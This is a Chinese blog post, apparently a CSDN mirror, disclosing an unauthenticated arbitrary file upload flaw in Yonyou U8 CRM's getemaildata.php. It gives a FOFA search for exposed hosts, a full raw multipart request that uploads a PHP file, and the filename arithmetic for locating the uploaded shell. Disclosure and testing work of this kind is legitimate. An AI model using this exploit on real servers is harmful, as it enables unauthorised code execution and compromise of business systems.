码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 用友U8 crm客户关系管理存在任意文件上传漏洞


    用友U8 crm客户关系管理存在任意文件上传漏洞

    • 一、 用友U8 crm客户关系管理简介
    • 二、漏洞描述
    • 三、影响版本
    • 三、fofa查询语句
    • 五、漏洞复现
    • 六、POC&EXP
      • 1.发送文件md5的1234内容
      • 2.发送请求包如果有md5就表示成功
      • 小龙POC检测
    • 七、修复建议

    免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

    一、 用友U8 crm客户关系管理简介

    用友U8客户关系管理全面解决方案是基于中国企业最佳营销管理实践,更符合中国企业营销管理特点,客户关系管理的整合营销平台。产品融合数年来积累的知识、方法和经验,目标是帮助企业有效获取商机、提升营销能力。

    二、漏洞描述

    用友U8 crm客户关系管理 ajax/getemaildata.php任意文件上传漏洞

    三、影响版本

    用友U8 CRM
    在这里插入图片描述

    三、fofa查询语句

    body=“用友U8CRM”

    五、漏洞复现

    漏洞链接:http://127.0.0.1/ajax/getemaildata.php?DontCheckLogin=1

    漏洞数据包:

    POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
    Connection: close
    Content-Length: 205
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykS5RKgl8t3nwInMQ
    Accept-Encoding: gzip, deflate
    
    ------WebKitFormBoundarykS5RKgl8t3nwInMQ
    Content-Disposition: form-data; name="file"; filename="ceshi.php "
    Content-Type: text/plain
    
    <?php echo md5(1234);?>
    
    ------WebKitFormBoundarykS5RKgl8t3nwInMQ
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15

    1.上传之后返回的路径为:上传之后返回的路径为:D:\U8SOFT\turbocrm70\code\www\tmpfile\mht80A1.tmp.mht

    2.文件名称为:mht80A1.tmp.mht,直接访问这个文件不解析,需要访问另一个文件

    3.上传之后会在目录下生成两个文件tmp.mht和tmp.php文件

    4.访问的解析文件格式为udp***.tmp.php

    5.星号部分为返回的文件名的十六进制减去一

    6.例如:80A1——>38304131(十六进制),38304130(十六进制减一)——>80A0

    7.最终的shell文件名为:http://127.0.0.1/tmpfile/upd80A0.tmp.php

    在这里插入图片描述

    六、POC&EXP

    1.发送文件md5的1234内容

    在这里插入图片描述
    返回了正确的路径

    2.发送请求包如果有md5就表示成功

    在这里插入图片描述
    在这里插入图片描述

    小龙POC检测

    小龙POC传送门【已经更新】: 小龙POC工具
    在这里插入图片描述

    七、修复建议

    升级版本

  • 相关阅读:
    CMake官方教程3--对库加入使用限制
    LayUi之用户(URUD)
    HTML笔记
    PHP封装CURL类 请求第三方地址
    无心剑汉英双语诗003. 《书海》
    2023-09-25 LeetCode每日一题(LFU 缓存)
    什么是数字孪生?
    Pulsar-Pulsar 之 pulsar manager
    大数据应用常用打包方式
    智慧公厕是将数据、技术、业务深度融合的公共厕所敏捷化“操作系统”
  • 原文地址:https://blog.csdn.net/holyxp/article/details/133348934
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号